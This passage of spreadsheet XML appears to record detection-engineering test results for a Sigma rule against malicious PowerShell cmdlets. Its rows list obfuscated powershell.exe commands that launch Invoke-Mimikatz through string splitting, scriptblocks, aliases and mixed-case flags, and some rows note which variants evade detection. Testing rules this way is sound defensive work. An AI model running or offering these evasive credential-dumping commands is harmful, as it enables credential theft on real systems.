      <c r="E2971" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -c "&amp; { $k = 'Invoke-'; $m = 'Mimikatz'; Invoke-Expression ($k + $m) }"</t>
        </is>
      </c>
      <c r="F2971" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2971" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2971" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I2971" s="44" t="inlineStr">
        <is>
          <t>HackTool - Mimikatz Execution (a642964e-bead-4bed-8910-1bb4d63e3b4d); HackTool - Mimikatz Execution (a642964e-bead-4bed-8910-1bb4d63e3b4d)</t>
        </is>
      </c>
      <c r="J2971" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2971" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2972" ht="15.75" customHeight="1" s="42">
      <c r="A2972" s="43" t="n"/>
      <c r="B2972" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C2972" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D2972" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E2972" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -commaND "&amp; { $k = 'Invoke-'; $m = 'Mimikatz'; Invoke-Expression ($k + $m) }"</t>
        </is>
      </c>
      <c r="F2972" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2972" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2972" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I2972" s="43" t="inlineStr">
        <is>
          <t>HackTool - Mimikatz Execution (a642964e-bead-4bed-8910-1bb4d63e3b4d); HackTool - Mimikatz Execution (a642964e-bead-4bed-8910-1bb4d63e3b4d)</t>
        </is>
      </c>
      <c r="J2972" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2972" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2973" ht="15.75" customHeight="1" s="42">
      <c r="A2973" s="43" t="n"/>
      <c r="B2973" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C2973" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D2973" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E2973" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -COmMAND "&amp; { $k = 'Invoke-'; $m = 'Mimikatz'; Invoke-Expression ($k + $m) }"</t>
        </is>
      </c>
      <c r="F2973" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2973" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2973" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I2973" s="44" t="inlineStr">
        <is>
          <t>HackTool - Mimikatz Execution (a642964e-bead-4bed-8910-1bb4d63e3b4d); HackTool - Mimikatz Execution (a642964e-bead-4bed-8910-1bb4d63e3b4d)</t>
        </is>
      </c>
      <c r="J2973" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2973" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2974" ht="15.75" customHeight="1" s="42">
      <c r="A2974" s="43" t="n"/>
      <c r="B2974" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C2974" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D2974" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E2974" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -cOMmand "&amp; { $k = 'Invoke-'; $m = 'Mimikatz'; Invoke-Expression ($k + $m) }"</t>
        </is>
      </c>
      <c r="F2974" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2974" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2974" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I2974" s="44" t="inlineStr">
        <is>
          <t>HackTool - Mimikatz Execution (a642964e-bead-4bed-8910-1bb4d63e3b4d); HackTool - Mimikatz Execution (a642964e-bead-4bed-8910-1bb4d63e3b4d)</t>
        </is>
      </c>
      <c r="J2974" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2974" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2975" ht="15.75" customHeight="1" s="42">
      <c r="A2975" s="43" t="n"/>
      <c r="B2975" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C2975" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D2975" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E2975" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -comMAnd "&amp; { $k = 'Invoke-'; $m = 'Mimikatz'; Invoke-Expression ($k + $m) }"</t>
        </is>
      </c>
      <c r="F2975" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2975" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2975" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I2975" s="44" t="inlineStr">
        <is>
          <t>HackTool - Mimikatz Execution (a642964e-bead-4bed-8910-1bb4d63e3b4d); HackTool - Mimikatz Execution (a642964e-bead-4bed-8910-1bb4d63e3b4d)</t>
        </is>
      </c>
      <c r="J2975" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2975" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2976" ht="15.75" customHeight="1" s="42">
      <c r="A2976" s="43" t="n"/>
      <c r="B2976" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C2976" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D2976" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E2976" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -CoMMaND "&amp; { $k = 'Invoke-'; $m = 'Mimikatz'; Invoke-Expression ($k + $m) }"</t>
        </is>
      </c>
      <c r="F2976" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2976" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2976" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I2976" s="44" t="inlineStr">
        <is>
          <t>HackTool - Mimikatz Execution (a642964e-bead-4bed-8910-1bb4d63e3b4d); HackTool - Mimikatz Execution (a642964e-bead-4bed-8910-1bb4d63e3b4d)</t>
        </is>
      </c>
      <c r="J2976" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2976" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2977" ht="15.75" customHeight="1" s="42">
      <c r="A2977" s="43" t="n"/>
      <c r="B2977" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C2977" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D2977" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E2977" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -Command "[scriptblock]::Create('In' + 'voke-Mimikatz').Invoke()"</t>
        </is>
      </c>
      <c r="F2977" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2977" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2977" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I2977" s="44" t="inlineStr">
        <is>
          <t>HackTool - Mimikatz Execution (a642964e-bead-4bed-8910-1bb4d63e3b4d); HackTool - Mimikatz Execution (a642964e-bead-4bed-8910-1bb4d63e3b4d)</t>
        </is>
      </c>
      <c r="J2977" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2977" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2978" ht="15.75" customHeight="1" s="42">
      <c r="A2978" s="43" t="n"/>
      <c r="B2978" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C2978" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D2978" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E2978" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -cOmmAnd "[scriptblock]::Create('In' + 'voke-Mimikatz').Invoke()"</t>
        </is>
      </c>
      <c r="F2978" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2978" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2978" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I2978" s="44" t="inlineStr">
        <is>
          <t>HackTool - Mimikatz Execution (a642964e-bead-4bed-8910-1bb4d63e3b4d); HackTool - Mimikatz Execution (a642964e-bead-4bed-8910-1bb4d63e3b4d)</t>
        </is>
      </c>
      <c r="J2978" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2978" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2979" ht="15.75" customHeight="1" s="42">
      <c r="A2979" s="43" t="n"/>
      <c r="B2979" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C2979" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D2979" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E2979" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -c "[scriptblock]::Create('In' + 'voke-Mimikatz').Invoke()"</t>
        </is>
      </c>
      <c r="F2979" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2979" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2979" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I2979" s="43" t="inlineStr">
        <is>
          <t>HackTool - Mimikatz Execution (a642964e-bead-4bed-8910-1bb4d63e3b4d); HackTool - Mimikatz Execution (a642964e-bead-4bed-8910-1bb4d63e3b4d)</t>
        </is>
      </c>
      <c r="J2979" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2979" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2980" ht="15.75" customHeight="1" s="42">
      <c r="A2980" s="43" t="n"/>
      <c r="B2980" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C2980" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D2980" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E2980" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -COMMand "[scriptblock]::Create('In' + 'voke-Mimikatz').Invoke()"</t>
        </is>
      </c>
      <c r="F2980" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2980" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2980" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I2980" s="44" t="inlineStr">
        <is>
          <t>HackTool - Mimikatz Execution (a642964e-bead-4bed-8910-1bb4d63e3b4d); HackTool - Mimikatz Execution (a642964e-bead-4bed-8910-1bb4d63e3b4d)</t>
        </is>
      </c>
      <c r="J2980" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2980" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2981" ht="15.75" customHeight="1" s="42">
      <c r="A2981" s="43" t="n"/>
      <c r="B2981" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C2981" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D2981" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E2981" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -ComMAND "[scriptblock]::Create('In' + 'voke-Mimikatz').Invoke()"</t>
        </is>
      </c>
      <c r="F2981" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2981" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2981" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I2981" s="43" t="inlineStr">
        <is>
          <t>HackTool - Mimikatz Execution (a642964e-bead-4bed-8910-1bb4d63e3b4d); HackTool - Mimikatz Execution (a642964e-bead-4bed-8910-1bb4d63e3b4d)</t>
        </is>
      </c>
      <c r="J2981" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2981" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2982" ht="15.75" customHeight="1" s="42">
      <c r="A2982" s="43" t="n"/>
      <c r="B2982" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C2982" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D2982" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E2982" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -Command "Set-Alias 'NotMalicious' 'Invoke-Mimikatz'; NotMalicious"</t>
        </is>
      </c>
      <c r="F2982" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2982" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H2982" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I298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82" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2982" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2983" ht="15.75" customHeight="1" s="42">
      <c r="A2983" s="43" t="n"/>
      <c r="B2983" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C2983" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D2983" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E2983" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -c "Set-Alias 'NotMalicious' 'Invoke-Mimikatz'; NotMalicious"</t>
        </is>
      </c>
      <c r="F2983" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2983" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H2983" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I298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83" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2983" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2984" ht="15.75" customHeight="1" s="42">
      <c r="A2984" s="43" t="n"/>
      <c r="B2984" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C2984" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D2984" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E2984" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -cOmmanD "Set-Alias 'NotMalicious' 'Invoke-Mimikatz'; NotMalicious"</t>
        </is>
      </c>
      <c r="F2984" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2984" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H2984" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I298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84" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2984" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2985" ht="15.75" customHeight="1" s="42">
      <c r="A2985" s="43" t="n"/>
      <c r="B2985" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C2985" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D2985" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E2985" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -cOmManD "Set-Alias 'NotMalicious' 'Invoke-Mimikatz'; NotMalicious"</t>
        </is>
      </c>
      <c r="F2985" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2985" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H2985" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I298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85" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2985" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2986" ht="15.75" customHeight="1" s="42">
      <c r="A2986" s="44" t="n"/>
      <c r="B2986" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C2986" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D2986" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E2986" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -Command "$part1 = 'Invoke-'; $part2 = 'Mimikatz'; $cmd = $part1 + $part2; iex $cmd"</t>
        </is>
      </c>
      <c r="F2986" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2986" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2986" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I2986" s="44" t="inlineStr">
        <is>
          <t>HackTool - Mimikatz Execution (a642964e-bead-4bed-8910-1bb4d63e3b4d); HackTool - Mimikatz Execution (a642964e-bead-4bed-8910-1bb4d63e3b4d)</t>
        </is>
      </c>
      <c r="J2986" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2986" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2987" ht="15.75" customHeight="1" s="42">
      <c r="A2987" s="44" t="n"/>
      <c r="B2987" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C2987" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D2987" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E2987" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -c "$part1 = 'Invoke-'; $part2 = 'Mimikatz'; $cmd = $part1 + $part2; iex $cmd"</t>
        </is>
      </c>
      <c r="F2987" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2987" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2987" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I2987" s="44" t="inlineStr">
        <is>
          <t>HackTool - Mimikatz Execution (a642964e-bead-4bed-8910-1bb4d63e3b4d); HackTool - Mimikatz Execution (a642964e-bead-4bed-8910-1bb4d63e3b4d)</t>
        </is>
      </c>
      <c r="J2987" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2987" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2988" ht="15.75" customHeight="1" s="42">
      <c r="A2988" s="44" t="n"/>
      <c r="B2988" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C2988" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D2988" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E2988" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -cOmMand "$part1 = 'Invoke-'; $part2 = 'Mimikatz'; $cmd = $part1 + $part2; iex $cmd"</t>
        </is>
      </c>
      <c r="F2988" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2988" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2988" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I2988" s="44" t="inlineStr">
        <is>
          <t>HackTool - Mimikatz Execution (a642964e-bead-4bed-8910-1bb4d63e3b4d); HackTool - Mimikatz Execution (a642964e-bead-4bed-8910-1bb4d63e3b4d)</t>
        </is>
      </c>
      <c r="J2988" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2988" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2989" ht="15.75" customHeight="1" s="42">
      <c r="A2989" s="44" t="n"/>
      <c r="B2989" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C2989" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D2989" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E2989" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -COMmaNd "$part1 = 'Invoke-'; $part2 = 'Mimikatz'; $cmd = $part1 + $part2; iex $cmd"</t>
        </is>
      </c>
      <c r="F2989" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2989" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2989" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I2989" s="44" t="inlineStr">
        <is>
          <t>HackTool - Mimikatz Execution (a642964e-bead-4bed-8910-1bb4d63e3b4d); HackTool - Mimikatz Execution (a642964e-bead-4bed-8910-1bb4d63e3b4d)</t>
        </is>
      </c>
      <c r="J2989" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2989" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2990" ht="15.75" customHeight="1" s="42">
      <c r="A2990" s="44" t="n"/>
      <c r="B2990" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C2990" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D2990" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E2990" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -ComManD "$part1 = 'Invoke-'; $part2 = 'Mimikatz'; $cmd = $part1 + $part2; iex $cmd"</t>
        </is>
      </c>
      <c r="F2990" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2990" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2990" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I2990" s="44" t="inlineStr">
        <is>
          <t>HackTool - Mimikatz Execution (a642964e-bead-4bed-8910-1bb4d63e3b4d); HackTool - Mimikatz Execution (a642964e-bead-4bed-8910-1bb4d63e3b4d)</t>
        </is>
      </c>
      <c r="J2990" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2990" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2991" ht="15.75" customHeight="1" s="42">
      <c r="A2991" s="44" t="n"/>
      <c r="B2991" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C2991" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D2991" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E2991" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -Command "Invoke-Mimikatz"</t>
        </is>
      </c>
      <c r="F2991" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2991" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H2991" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I299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1" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2991" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2992" ht="15.75" customHeight="1" s="42">
      <c r="A2992" s="44" t="n"/>
      <c r="B2992" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C2992" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D2992" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E2992" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -cOmmAnd "Invoke-Mimikatz"</t>
        </is>
      </c>
      <c r="F2992" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2992" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H2992" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I2992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2" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2992" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2993" ht="15.75" customHeight="1" s="42">
      <c r="A2993" s="44" t="n"/>
      <c r="B2993" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C2993" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D2993" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E2993" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -c "Invoke-Mimikatz"</t>
        </is>
      </c>
      <c r="F2993" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2993" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H2993" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I2993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3" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2993" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2994" ht="15.75" customHeight="1" s="42">
      <c r="A2994" s="44" t="n"/>
      <c r="B2994" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C2994" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D2994" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E2994" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -comMAND "Invoke-Mimikatz"</t>
        </is>
      </c>
      <c r="F2994" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2994" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H2994" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I2994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4" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2994" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2995" ht="15.75" customHeight="1" s="42">
      <c r="A2995" s="44" t="n"/>
      <c r="B2995" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C2995" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D2995" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E2995" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -cOmmANd "Invoke-Mimikatz"</t>
        </is>
      </c>
      <c r="F2995" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2995" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H2995" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I299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5" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2995" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2996" ht="15.75" customHeight="1" s="42">
      <c r="A2996" s="44" t="n"/>
      <c r="B2996" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C2996" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D2996" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E2996" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -CoMMaNd "Invoke-Mimikatz"</t>
        </is>
      </c>
      <c r="F2996" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2996" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H2996" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I299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6" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2996" s="44" t="b">
        <v>0</v>
